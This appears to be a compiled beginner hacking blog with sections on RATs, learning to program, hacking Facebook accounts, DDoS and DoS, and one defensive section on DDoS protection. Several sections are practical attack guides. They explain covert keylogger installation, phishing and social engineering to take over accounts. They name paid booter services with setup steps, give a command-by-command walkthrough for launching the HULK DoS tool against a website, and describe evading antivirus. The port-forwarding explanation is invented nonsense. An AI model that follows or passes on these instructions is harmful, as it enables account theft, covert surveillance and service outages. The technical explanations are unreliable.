This is an extension of the previous point. Before performing any hack, you should always try to visualize every step. See it in your mind, what all you need to do and what exactly is the expected outcome. You should try to avoid involving someone else’s property or devices when learning hacking. If you stick to what you know, you should always be able to predict what will happen. That will leave only typos and genuine errors. Hacking is not all that dangerous and unpredictable if you know what you’re doing.
•Don’t hack anyone without their knowledge.
It may be only a fun little trick for you, but for the other person it could be an invasion of privacy or perhaps a massive violation of all the trust they put in you, for the more dramatic ones. Not all hacking techniques can be tried on yourself for practice. Most can, but still some like those involving networking need more systems. It’s great if you can find a willing and trust-worthy friend and try hacking eachother for learning. If you ever consider trying larger and more elaborate hacks, taking written permission from all the involved parties is a good idea. For example (students), asking your computer teacher permission to simulate a DDOS attack in the computer lab, or perhaps the local cyber cafe. Another example, hacking public (protected) WiFi networks is illegal. You could try knocking on your neighbour’s door and advising them to switch over from WEP to WPA. This is what puts the “ethical” in “ethical hacker” and the chances of them giving you the new password by simply asking also increase.
•Know when to stop.
Companies hire penetration testing firms to check the security of their networks but almost always want them to stay away from private and confidential information, even if they have access. If someone were able to “guess” the facebook password of someone, it doesn’t give them the right to exploit their ability without regard for anyone else. With each passing moment, our lives are getting more and more integrated with technology making it extremely important to know when to stop.
•Know the law.
In normal hacking, you will probably never need to be worried about legal trouble but it won’t hurt to double check. To be extra sure, you can google up the constitution of your country or search for relevant laws regarding hacking.
That’s pretty much all a beginner hacker needs to know about the legal side of hacking. Once again, anything you do on your own computer that affects nobody else is usually safe (for others). As the world is increasingly interconnected, everyone shares the responsibility of securing cyberspace. Hence, it is better to be despised for anxious apprehensions, than ruined by superficial security (a little bit).

R.A.T’s

Here is an introduction to Remote administration tools. These are generally called RATs, and yes they have a vicious bite. although this page doesn’t teach you how to blast open a RAT straight away, here you will learn everything you will need to start a ‘plague’. RATs form an entire class of hacking including trojan infections, backdoors etc. But to go further, we need to clear up the basics first so, here we go.
What’s a RAT?
RAT = Remote Administration Tool. It is mostly used for malicious purposes, such as controlling remote PC’s, stealing victims data, deleting or editing some files. One can infect someone else by sending them a file called “Server”. If and when this server file is opened, it burrows itself deep in the system and starts to run in the background. Further, it may also send the attacker a message every time it is active like when a computer is turned on.
How are they spread?
Some RATs can spread over P2P (peer to peer) file sharing services (Torrents, mostly..), messenger and email spams(MSN, Skype, AIM etc.) while other may tag along hiding behind some other software. The user installs something, clicks “Next” 5 times and voila! Without anyone ever finding out the RAT has compromised a system.
How is the server controlled?
Once installed, the RAT server can be controlled via what’s called a RAT client. Basically it’s just an application that tracks your RAT’s movements. It tells you how many systems are infected, information on their system, versions of OS and other softwares, their IP address etc. It shows a whole list of IP addresses which may be connected to immediately. After connecting, you can make the computer do pretty much anything (except maybe, do hula dance XD) – Send a keylogger, uninstall their antivirus, crash the system etc.
What is port forwarding?
If you’re a gamer or are used to downloading torrents, you must’ve heard “Port Forwarding” as a way to increase download speeds, reduce lag etc. Port forwarding is the redirecting of computer signals to follow specific electronic paths into your computer.If the computer signal can find its way into your computer a few milliseconds quicker, it will add up to be a possibly dramatic speed increase for your game or your downloading. Don’t start jumping around just yet, your internet connection is probably already optimized for maximum performance (It is so, by default).
Let’s take an example: That pencil-thin network cable (that goes into the network adapter) at the back of your computer contains 65,536 microscopic pathways inside it. Your network cable is just like a major highway, except your network cable has freaking 65,536 lanes, and there is a tollboth on each lane. We call each lane a ‘port’.(FYI, 2^16 = 65,536. So, that tells us 2 bytes = 16 bits in all is sort of the “width” of network cables, which gives us 65,536 different possible combinations – hence the same number of ports.)
Your internet signal is comprised of millions of tiny little cars that travel on these 65,536 lanes. We call these little cars “transfer packets”. Computer transfer packets can travel very quickly (just under the speed of light actually), but they do observe a stop-and-go set of rules, where they are required to stop at each major network intersection as if it were a border crossing between countries, or connecting to a different ISP. At each intersection, the packet must do three things:
►Find an open port,
►Pass the identification test that will allow it through that port, and if not,
►Move to the next port and try again, until it is allowed to pass through the toll.
In some cases, packets sent by hackers will be caught and held at the intersection, where they will then be dissolved into random electrons. When this happens, it is called “packet filtering” or “packet sniping”. Likewise, if a hacker gains control of a much used port, he can control every bit of information that passes through it – Read it, modify or even delete.
All in all, Port forwarding is when you command your network router to proactively identify and redirect every packet to travel on specific electronic lanes. Instead of having every packet stop at each port in turn until it finds an open port, a router can be programmed to expedite the process by identifying and redirecting packets without having them stop at each port. Your router then acts like a type of hyper-fast traffic policeman who directs traffic in front of the tollbooths.
Can an antivirus catch a RAT?
Yes. Actually, Hell Yes! As a hacker, you will find antiviruses blocking your path at every damn step. (But we are white hats, right? No matter how annoying, it’s there to protect us, so be happy). But, like every problem, this too has a solution – Encryption. It’s called making your server “FUD” – Fully Undetectable. For example, typical encrypted formats, say password protected .zip or .rar files (if they contain malicious softwares) can be caught by an AntiVirus. Making a program FUD does pretty much the same thing, except it does so like a drunkard with OCD (Obsessive-compulsive disorder). What I mean is, running the software through an encryption program again and again so that nothing can recognize what it is and it can pass off as random harmless noise. Something called “Hex Editing” is a well known way to go about doing this. This is a whole different topic in itself. So, more on this later.
Legal or illegal?
Well, some RATs are legal, and some are not. Legal are the ones without a backdoor, and they have abillity to close connection anytime.(Backdoor is something that gives the attacker access to the victim’s system without their knowledge). Plus these are not really referred to as RAT’s, that’s just our (hacker’s) dirty language Illegal ones are used for hacking and they may possibly steal data (or worse).
A few examples are written below:
Legal:
►TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
►UltraVNC – Remote support software for on demand remote computer support.
►Ammyy Admin – Like TeamViewer, Ammyy Admin is another reliable and friendly tool for remote computer access.
►Mikogo – Mikogo is an Online Meeting, Web Conferencing, Remote Support tool where you can share your screen with several participants in real-time over the Web.
The above tools while very useful and very legal, require a green light from both the parties involved. That’s the main difference between the ones above and the ones below:
Illegal (or barely legal):
►Spy-Net
►Cerberus Rat
►CyberGate Rat
►SubSeven
►Turkojan
►ProRat
These are all used for one purposes – Causing trouble, to say the least. RATs like the ones above are meant to be stealthily. After all, no hacker will want their victims to get a message like: “Congratulations! You have been infected!”(Or maybe let the AntiVirus find it). Use any of these on an actual victim, and you will get a ticket to jail, or at least a fine. But these are actually used, and mostly without anyone ever suspecting anything wrong. The thing is, hacking is becoming much more of a serious business than a game. A RAT that simply crashes the OS or formats the hard disk gives nothing to the attacker, So why bother doing it in the first place ? RATs today are evolving (pun unintended). They are becoming more like “parasites” instead of predators.
They may be used for DDOSing (by creating massive botnets with tens of thousands of slave computers), clicking ads in the background(the usual click fraud), increasing blog and youtube “views”, even using the compromised systems to “earn money online”, by pushing surveys, exploiting the websites which offer a pay-per-install model, even “mining” bitcoins (Bitcoins are just a fancy new online currency. Bitcoins can be earned by devoting CPU power, then converted into real money, hence their potential exploitation by using RATs). (Don’t bother googling this. Like every “Online money making” offer, whether it works or not, this too is a waste of your time. No offence to the BitCoin Foundation :-D)
Whats DNS host?
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.
What all can a RAT do?
Here is list of basic features:
• Manage files. (Delete/Modify)
• Control web browser(Change homepage, open a website etc.)
• Get system informations(OS Version, AV name, RAM Memory, Computer name, Network Addresses etc.)
• Get passwords, CC numbers or private data etc. (via Keylogger)
• View and control remote desktop (Take screenshot or a snap from the webcam)
• Record camera, sound (Control mic and camera)
• Control mouse, keyboard input.
• Pretty much everything you can do on your own computer, except play GTA V remotely. (Although technically, you can do that too)

Programming – II

Programming is a vast field. Even after years of experience a programmer is always bumping into new things. That’s part of what makes it so exciting, you can always find something new to do, possibilities are endless. So, here we try to answer another question in the mind of wannabe programmers: How to start?
Programming can only be caught, never taught. Learning programming encompasses two main things, reading and doing, with greater emphasis on the latter. You can only know what to do by reading, but you can learn only by doing. Even when you may get stuck somewhere or not fully understand something, doing it yourself will always clear all your doubts. I myself learned most of the programming I know through different sources on the internet and tons of books. Below are some of the best ones, I’ve come across yet: (categorized by languages) (Note: Most of these are completely free, but some may offer paid packages and features too. Also, try enlarging the text from the menu button if the links are hard to click. Lastly the websites are mainly designed for computers and may or may not work properly on mobile phones.)
Before starting, a few special mentions:
► http://www.w3schools.com/
Without a doubt, this is one of the best websites out there to learn programming. If you want to get into web development, there’s no better place to start than W3Schools. HTML, CSS, JavaScript, SQL, PHP, XML, JQuery – You name it, this website has an abundance of learning material for vast number of programming languages and it’s tailor made for beginners.
► http://www.learnstreet.com/
A relatively young website, but it has a lot to offer. It has highly interactive free online courses on Python, Ruby and JavaScript (yet). Again, a great place for beginners to start. It presents examples and questions that the user has to actively participate in and solve problems in the browser itself.
► http://teamtreehouse.com/
A very well made website, it has tons of “projects” in different programming languages. Each of these projects are a compilation of videos in which a person commentates or teaches you about completing the project, what all you need to do and how to do it. Clearly, they’ve put a lot of effort into it and it did come out great.
Other than these, there are many more websites which offer great courses and material for learning programming. A few of these are mentioned below according to languages:
►Multiple Languages:
• https://www.bitcast.io/
• https://www.udacity.com/
• http://www.codecademy.com/
• https://www.codeschool.com/
►Java
• http://www.learneroo.com/
• http://funprogramming.org/
►Javascript
• http://codehs.com/
• http://jsdares.com/
►Ruby
• https://rubymonk.com/
• http://hackety.com/
• http://tryruby.org/
►HTML, CSS, JAVASCRIPT
• http://css-tricks.com/
• http://www.codeavengers.com/
• https://tutsplus.com/
►Other / Uncategorized
• https://www.codeeval.com/
• http://quackit.com/
• https://www.khanacademy.org/
• https://www.udemy.com/
• http://net.tutsplus.com/
• http://projecteuler.net/
• http://webdesign.tutsplus.com/
• http://wp.tutsplus.com/
• http://www.webtechlearning.com/
• https://www.coursera.org/

Programming – I

When it comes to computers and everything related to them, programming is the mind and body, heart and soul. Without software, any piece of hardware is nothing but a random collection of metal and plastic. But with a beautiful stream of 1’s and 0’s it can almost literally be pumped full of life. Everything we see and everything we do on our mobiles and computers and really every fancy new gadgets these days, was created by someone, somewhere who night after night tirelessly wrote a program in code to create something wonderful.
The users often don’t fully comprehend exactly what goes on behind the scenes of any decent piece of software. For this reason, here’s a little reality check before we get to the main topic. A line of code is a single average line in a program and usually contains around 40-50 characters. The Unix 1.0 OS (1970) contained about 10,000 lines of code (LoC). Today, an average iOS or android app has approximately 50,000. That is 50,000 lines typed word by word by someone, and we’re just getting started. Photoshop CS6 clocks in at a freaky 5 million LoC and the Firefox browser? – 10 million. Moving on to the big players, we’ve got Windows 7 at 40 million and guess what? Microsoft office is actually bigger than the parent OS itself (about 45 million LoC). Now that you’re gaining a little perspective, let’s blow it to hell. The website healthcare.gov (reportedly) has an unbelievable 500 million lines of code. To put that into perspective, if a decent and immortal programmer started making this website in the last ice age 10,000 years ago, they’d still be going today, while of course cursing their destiny.
What’s the point of telling you all this?
Programming is not for the faint hearted. It takes effort (but not that much). Truth be told, lines of code is a very poor measure for difficulty. It’s like measuring a person’s success by counting the number of words they’ve spoken, ridiculous and not really related. The point of all that was to prove wrong the ones who overstate and exaggerate the difficuty of learning programming. It’s almost always pictured as something unbelievably boring, dry, dull and plain geeky. According to movies, a programmer is a fat nerdy guy with huge spectacles sitting in front of the computer mindlessly typing away while all that s/he accomplishes is something facetious and laughable. This could not be more wrong. Undoubtedly, programming can only be done by someone who thoroughly enjoys it. Being a programmer myself, I can honestly say there’s simply no way to describe it. It’s different for everyone which is why to truly find out if programming is for you, you will just have to try it out for yourself.
Programming teaches you how to think. It teaches you how to solve any problem, whether it is considered possible or not is irrelevant.
Moving On, let’s take a look at how exactly programming can help a hacker. First of all, it is what differentiates you from script kiddies. If the only hacks someone can do are made by others, then that person really cannot be called a “Hacker”. If you ever tried googling about hacking and gave up soon without finding an answer, you’re not alone. The main reason most hackers are not big on helping others is because they start getting bombarded by noobs asking them to hack (fb) accounts and explain something so basic and silly that they just give up and start ignoring them. Programming helps you understand how everything in your smarter idiot box comes together. It gives you better knowledge about how to identify and solve any problems by yourself. By knowing programming, you get a better understanding about how vulnerabilities and exploits work. Most importantly you can code your own tools, scripts, exploits, shell codes, entire applications and modify existing ones according to your own needs. No need to learn it from others, you can simply make it your own. You get to explore and pioneer in uncharted territory.
What all can you expect to do with programming? Sky’s not the limit, when there are footprints on the Moon. Everything, literally everything you can think of. But that’s the big picture stuff. Let’s take a sneak peek of the programming world with an example of this website itself. Press a button in the sub menu up top, you’ll see a further menu pop up. What I did to make that happen is I wrote a simple function (set of commands) that should be executed when the user presses the menu button. Similarly hovering your mouse over the button changes it’s color. To make that happen I wrote a small JS script that looks for the event of mouse hover over the button and then changes the color.
These were just a couple of examples in an infinite ocean of possibilities. In programming, you can expect to find and identify problems and find your way through them with logical thinking.
So that’s that for an introduction to programming. The next question that comes is where to start?
All you have to do is pick a language and dive in. Which one? There’s simply no right or wrong answer to this question. Fair warning, you’ll have to learn quite a few languages for hacking, preferably as many as possible. Even if you will not need to write in every language, you should know how to at least read it. Nobody is perfect, least of all, programming languages. Each one has it’s pros and cons. You can do the same thing in a million different ways with a dozen prorgamming languages. The time spent analyzing these useless facts could better be spent actually learning something. There is nothing to gain from comparing languages. Knowing quite a few myself, I can tell you the difference between languages is almost like the difference between “Hello”, “Hi” and “Hey”. Although languages like HTML, SQL, Java are used for different things, it really doesn’t matter where you start since you should learn as many languages as you can. For making a webpage you’ll need HTML, for making applications – Visual Basic, for data storage – SQL, for complex programs – C++ (just an example). Clearly, every single one of these and others as well are useful to a hacker. So, for the last time, start wherever you want to (or randomly).
The final destination is the same, below are a few of the different paths (languages) for a programming beginner to follow. It is generally advised to stick to mainstream languages when beginning and these are some of them:
►C++, Java, C# : These are the most used high level general purpose languages. Most of what you’ll ever do on a computer would not be possible without these. Almost every software, tools, applications is made by these. You are bound to run into these one day or another. They require a fair amount of effort but yield the greatest rewards. These are generally not recommended as a first language. My first language was C++, and it made learning every consequent language much easier. Once more, it’s up to you.
►HTML/SQL/XML : These are so easy, they’re almost not even worth learning. But they offer great rewards for very little effort, something you’ll never hear in the rest of the programming world. Actually, you can learn these just to tell people that you know so many computer languages. You can easily absorb the basics of these three, for example, in under a day. SQL is particularly important for hackers as it can, in some cases provide an easy way into a server’s database (SQL injection) – Definitely worth knowing, considering we’re all lazy and proud. (JavaScript also deserves a mention here, but it’s a wee bit bigger and deeper)
►Python, Ruby : These are two more quite powerful languages. Python is pretty much the best and most widely used scripting language out there, although it can be used generally also. Ruby is another general purpose language, MetaSploit is coded in Ruby.
These were just a few examples, there are several languages out there. Check out “Programming-II” for a compilation of the best sources and websites to start learning programming right away. Keep calm and code on.

Hacking Facebook

A note for the newcomers – Contrary to popular belief there doesn’t exist some secret software where one can just put in an email id, press “Enter” and all the passwords associated with that account magically appear. Hacking facebook, like any other hack takes time, skill and effort. Also, the methods are much the same for hacking any type of account for that matter.
There are 3 main methods used when it comes to Hacking Facebook accounts. Briefly,They are :
1.Keyloggers : Making the victim open up his account on a system with a keylogger attached/ Sending a remote keylogger to the victim.
2.Phishing : Making a fake login page and having the entered details sent to you.(This has been explained in the beginner section).
3.Social Engineering : This is just a fancy term for making the victim give up vital information in a supposedly casual conversation. The information may be the user’s recovery question’s answer, which can then be used to take over the account via : “Forgot your password? Click Here!” Button.
Some time ago, Facebook developers patched in a new security feature. In a nutshell, if facebook detects that your IP address is different from the usual(previously used) IP addresses, it may stop you from logging in without further identitiy verificiation which may be, for example: an SMS code. Now this can potentially effect every type of hack, but if it is infact possible there is only one way to know- By doing it. Hope for the best, Prepare for the worst.
1.Keyloggers:
A Keylogger is type of software that usually runs in the background, without the knowledge of an innocent victim and secretly records their actions. A wide variety of functionality is offered by various products : Almost all record every keystroke on the keyboard in a simple text file format, some record mouse clicks and pointer locations, some record folders and files opened and some even take screenshots at regular intervals.
Most of the keyloggers provide an option whether to store the text file locally send it to an FTP server or your email id. They can be installed and set up relatively easily like any other program. Once setup, they usually go into hiding as a background process leaving no trace on the surface and starting up automatically when the operating system starts.
For some reason people seem to avoid or look over keyloggers, I can give you my word this is the best and easiest method for hacking any type of account there is, so definitely check this out. In our case, we want the victim to login to their facebook account on a compromised system, one that has a stealthy keylogger installed. There are two ways to go about this :Installing a keylogger on your system and having them use it to login to their FB account, or if you have temporary access to their system- Installing it on their computer and having the log files sent to you by email or FTP.
Whichever way you prefer, the method is the same. Download a keylogger, follow the smooth setup instructions as you would when installing anything, customize settings according to your preference and Let it rip !
I have personally tried and tested the following keyloggers, you can choose any of these randomly since they all seem to do the job :
(i)Actual key-logger – Download from http://www.actualkeylogger.com/download-free-key-logger.html
(ii)Home key-logger – Download from http://www.kmint21.com/download.html
(iii) REFOG Free key-logger – Download from https://www.refog.com/download.html
(P.S- Certain full versions of very good keyloggers are available as torrents from websites like isohunt.com , kickass.to but these torrents are illegal and we shouldn’t use them)
2.Phishing : This method has been described in great detail in the beginner section. Follow the instructions carefully while using facebook.com instead of gmail.com.
3.Social Engineering :
Facebook uses security questions as a recovery method, almost everyone sets it up to a personal question like :
“Where were you born? ”
“What was your first pets name? ”
Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.
A social engineer runs what used to be called a “con game.” For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network’s security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access.
Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques.
For this method to work, you need to know the person whos account you want to hack. In fact, you need to know them well enough, such that it doesn’t seem suspicious when you carefully try to work up their recovery questions into your conversation and get them to answer it casually.
After that,using the “Forgot your password? Click Here!” Button one can simply turn over an account’s user. But even after this, your work is not done yet. Nowadays facebook has implemented a 24 hour delay before recovering the account and logging in, So if the victim happens to log in during that period they can reverse the process in seconds. Not only do you need careful planning, but also careful timing.
Facebook uses a verification method during recovery -if the victim’s email and phone number are no longer functional it asks to put in another phone number. If you can somehow get a hold of their cell phones or email accounts their account is yours, otherwise the process may be slow and fruitless.

Practicing For DDOS

What we’ll attempt to do in this article is similar to testing a nuclear bomb (okay, not really). But still, there’s no way to tell exactly what will happen, other than to blast the damn thing because more often than not that’s just the way it is with DDOSing.
To refresh your memory, DDOS Attacks involve saturating the target machine with external communications requests (packets) so much so that it cannot respond to legitimate traffic. In most cases, this presents an obvious obstacle – Where to get massive amounts of bandwidth? By definition, servers are designed to handle huge quantities of traffic and when we are trying to attack it with traffic, it’s going to be very difficult (or is it?).
The usual way to DDOS is to slowly build up a botnet for example, by spreading a trojan (or RAT) that installs the DDOSing software and sets up a backdoor listener. When the infection has spread to thousands of systems, the hacker then activates the trojan and the DDOSing begins. Clearly, breaking into several thousand systems is not very legal or ethical, so even if some genuine website administrator wants to perform a dummy DDOS just to see what will happen and what’s the best way to handle it, they won’t be able to do it. This is another reason why small websites particularly are very vulnerable to attack – they don’t practice because apparently the only way to practice is illegal. So, when they are hit by an actual DDOS they simply don’t stand a chance. So, below we take a look at a possible solution that works for both good and bad guys. An alternative practice methods for website admins and a shortcut for DDOSing for hackers.
The method described below is quite unpopular. In a sentence, we use online services to DDOS for us. These are called “stressers” or “booters” and are simply services which provide large internet bandwidth for the purposes of simulating a DDOS attack. Before moving on, some of the websites mentioned below do offer trials but most of them are fully unlocked only after a payment. So, these may be useful mainly for serious networking administrators or website owners only.
Clearly, doing an actual BlackHat DDOS using this is very much possible if done correctly. But that would require using a VPN or TOR browser to hide your identity. Even with that, since you would have to make a payment, it could potentially lead back to you making this a very dangerous alternative if not done exactly right. Hence, I recommend using this method only for what it’s meant for, as simply fooling around can get you into very serious legal trouble.
Below you can see the names of a few well known stressers and booters and the links to their websites.
#1: Power Stresser – http://www.powerstresser.com (60GB/s of Power)(Stop Button)(Instant)(Skype Resolvers)
#2: Titanium Stresser – http://titaniumstresser.net/ (Powerful)(Up for 3 years)(Best Price)(Great Support)
#3: Legion Stresser – http://legion.cm/ (Max Power) (Max Time)
For some reasons, the majority of these websites appear quite dull on first look. Perhaps they don’t want to attract a lot of attention. Anyways, In most of the above websites you’ll simply see a login page with a “Register” option. So, pretty much the only way to get inside is to make an account. Pick anyone and create an account. (Again, this tutorial is mainly for online service/website owners who want to make sure their website is well protected) Once you’ve registered for the first time. You will see several packages of boot time and strength. Whether you’re trying to DDOS someone else (which you shouldn’t) or your own online website or service, I recommend having several (2-3) booters or Stressers with moderate time instead of just 1 large DDOSer.
On The websites you will see a control panel-like window, where you can initiate your DDOS Attacks after selecting a package. To DDOS a home connection or a server, you will first need the (host) IP address. Many Booters Contain a built in Skype resolver and Domain Resolver. For “Port” option, the usual choice is Port 80 (Directed at home modems).
You will then be able to set your Boot time anywhere from 0 to the maximum time you paid for. Generally, UDP(User Datagram Protocol) is used for targeting a PC. For website and larger servers, SSYN attack is usually used which is considerably more powerful. You can think of these as DDOS attacks in which different types of optimal requests are sent for different situations and targets. Anything more than this will get a bit too technical than required here.
So that’s that for configuring and optimizing the DDOS attack. After this you will be able to start your DDOS attack as and when you please. Below you will find some useful relevant information that is frequently required for DDOSing using stressers and/or booters:
Skype Beta Resolver – http://www.iSkypeResolve.com
Other Ports:
(Home Connections)
53 – DNS Port
80 – Default Internet Port
(Xbox Connections)
80 – Default Internet Port
88 – Authentication Port
3074 – Xbox Default Port
(Web Servers)
21 – FTP Port
25 – SMTP/Mail
53 – DNS Port/Nameserver
80 – Default Internet Port
3306 – MySQL Port

Protecting Against DDOS

The goal of any DDoS attack is to overwhelm a service to the point where it no longer works. While DDoS has historically been just an annoyance, there is usually a financial impact, such as lost sales or a spike in bandwidth costs. Cloud-hosted services, which charge by usage, are especially financially vulnerable to an onslaught of traffic.
DDoS attacks use large numbers of computers simultaneously targeting a single service. The attack often comes from botnets, which are composed of PCs infected by a virus. Recently, DDoS has been used by political protesters, who crowdsource attackers through downloadable software.
Older DoS attacks like SYN floods used limited numbers of attackers, so it was possible to use automatic per-client rate-limiting, or to block the IPs. Modern DDoS techniques try to avoid large amounts of traffic per attacker, and rely purely on large numbers.
Many sites may think they’re too small to attract attention. However, DDoS isn’t a hard attack to perform. Ironically, DDoS is even available as a service. If your site is big enough to attract any business, it’s big enough to attract a potential attacker.
Reducing the cost of an attack starts with early detection. There are simple techniques you can use to alert yourself to an attack. Run a script on your server that sends a message periodically with the recent traffic count: You’ll get a warning either if the count jumps significantly, or the message doesn’t arrive. Additionally, use a remote monitoring program that periodically checks the service’s availability.
A large DDoS attack may block your management access if the site is remote. Try to make sure there’s a cost-effective out-of-band management solution.
Once you detect a DDoS attack, the first step is to identify its unique characteristics. Despite the availability of cleverer techniques, DDoS usually relies on brute force – which means that the traffic from all of the attackers will have unique similarities. Because large numbers of attackers will be involved, scattered across the Internet, blocking the IP addresses will be nearly impossible.
Instead, do a quick packet capture of the attack. Finding examples will be relatively easy, since most of the traffic will be DDoS traffic. Commonalities can often be found in the URI, user agent, or referrer. What you’re looking for is a pattern that you can block with your firewall, router ACL, IDS, etc. It will often be an ASCII or hex pattern at an offset. Become familiar with the capabilities of your equipment, and try some tests in preparation.
Once you have identified the attack fingerprint, it is time to set up a block within your firewall or router to drop the majority of packets. However, a high-bandwidth attack may simply exhaust your WAN link: You’ll have a clean LAN, but your service will still be unreachable. Contact your carrier now to figure out how to work with them during a DDoS attack, in case they need to do the blocking for you.
Some service providers offer “clean pipe” hosting with automatic DDoS squelching. There are also companies who offer products and services to detect and prevent DDoS. Depending on the specifics of your service, it may make financial sense to pay for one of these solutions. Don’t forget the option of simply hosting the service somewhere large enough to absorb the attack – but remember that DDoS against sites that charge by bandwidth can result in unexpectedly high bills.
During and after a DDoS attack, ask for help. Your regional CSIRT (Computer Security Incident Response Team) should be alerted, as they have expertise and contacts that can not only help you during the attack, but also start the process of figuring out who did it and how. A global list is available here: http://www.cert.org/csirts/national/contact.html
As cyber crimes get more sophisticated, businesses must be able to constantly adapt to these new security threats. While there are no methods or tools that can completely prevent DDoS attacks from happening, having a security “insurance policy” in place is the first step in ensuring that you are completely prepared. The ability to quickly suspend this new level of attack is tantamount to protecting company data as well as your business as a whole.

Launching DOS Attack

Most servers are built to handle a fairly large bandwidth and even the smaller ones can give maximum speeds to several hundreds of clients. Keeping this in mind, it is very difficult and for the most part impossible to actually bring down a website using DOS from a single computer. Where your internet speed might be 1Mbps, your target server might have several 100Mbps. This is the reason that most DOS attacks are actually DDOS,that is Distributed-Denial of Service.
DDOS attacks can easily bring down majority of websites. In DDOS, Botnets are used which are just a bunch of compromised systems who have been infected with a virus or trojan. A simple trojan can be sent out as a public download, and if the unsuspecting victims download it the trojan may silently settle down somewhere deep in the system and start up in the background without the user or the system ever knowing. When enough systems have been compromised in this way the master of the Botnet, the hacker who wants to DDOS a website may send out a message to the dormant trojans on several systems around the world, which may then indivisually begin attacking a server. This can be very harmful to the website, which due to lack of resources, may shut down for a long time and even get corrupted due to overloading. Further, since the requests for transactions are coming from seemingly random IP addresses all at once(the botnet), the victim may never find out the identity of the mastermind.
Although I won’t get into the technical details, here is an example of a fairly popular DOS tool – HULK. Hulk is just a simple python script that continuously sends out large packets from randomly generated IDs so as to fool the server. Again, using it from just one computer may not actually do anything to any big websites, but it may be able to bring down a small website, for example your school’s website in about a minute.
To perform this attack you need two things:
1. The python Engine (v2.x) – To run and compile the hulk script. You can get it here :
http://www.python.org/getit/
NOTE : Download the 2nd version only (for example the current one is 2.7.6), this script does not work with the 3.x version of python.
2. Hulk.py script – This will run like a normal cmd.exe window. It’s a small zip file,Get it here :http://packetstormsecurity.com/files/download/112856/hulk.zip
For technical details, The official website is :
http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/
When all is done, you should have python installed, and hulk.py file extracted. It would be easier if you installed Python to a root directory, for example :
C:\\PYTHON27.
Also, put the hulk.py file which you just extracted in the same root directory alongside the PYTHON27 folder(In my case, I put the hulk.py file in the C:\ directory).Again, both python folder and the hulk.py file are now in the C:\ ). With all that done, let’s launch our DOS attack !
1. Open Run, type cmd to start cmd.exe window.
2. Change directory to where you installed PYTHON and put hulk.py , Type ‘cd’ then the directory (Case sensitive) (cd= change directory)
cd C:\\PYTHON27
3. Now start up the hulk.py script as follows :
C:\\hulk.py http://www.google.com
(Write the directory of the hulk.py file followed by a space followed by the website you want to attack (Don’t actually try this with google, since they tend to block IPs with weird requests like the ones we are sending. You may be blocked from google for some time. If you want to try it out, consider setting up a small website on your own, or ask someone’s permission.)
You should now see something like:
HULK ATTACK STARTED
Give it a few seconds then it will show how many requests it has sent. A few more seconds and if the attack was succesfull you will see something like: ‘Response Code 500’
As soon as you spot this, try opening the website which may say : ‘Resource Limit Reached’ or ‘Service Unavailable’ meaning you have successfully brought down the website.
Technically, most servers may temporarily deny all requests from your ISP (internet service provider) and hence your IP address meaning that you’ve not actually brought down the website for the world but only for yourself(The website banned you). This is why DOS isn’t as effective as DDOS. When the server has to repeatedly deny several IP addresses, it truly runs out of resources for anyone wanting to open the website.

Introduction to DOS

A distributed denial of service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing denial of service for users of the targeted system. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users.
In a typical DDoS attack, the assailant begins by exploiting a vulnerability in one computer system and making it the DDoS master. The attack master, also known as the botmaster, identifies and identifies and infects other vulnerable systems with malware. Eventually, the assailant instructs the controlled machines to launch an attack against a specified target.
There are two types of DDoS attacks: a network-centric attack which overloads a service by using up bandwidth and an application-layer attack which overloads a service or database with application calls. The inundation of packets to the target causes a denial of service. While the media tends to focus on the target of a DDoS attack as the victim, in reality there are many victims in a DDoS attack , the final target and as well the systems controlled by the intruder. Although the owners of co-opted computers are typically unaware that their computers have been compromised, they are nevertheless likely to suffer a degradation of service and not work well.
A computer under the control of an intruder is known as a zombie or bot. A group of co-opted computers is known as a botnet or a zombie army. Both Kaspersky Labs and Symantec have identified botnets – not spam, viruses, or worms – as the biggest threat to Internet security.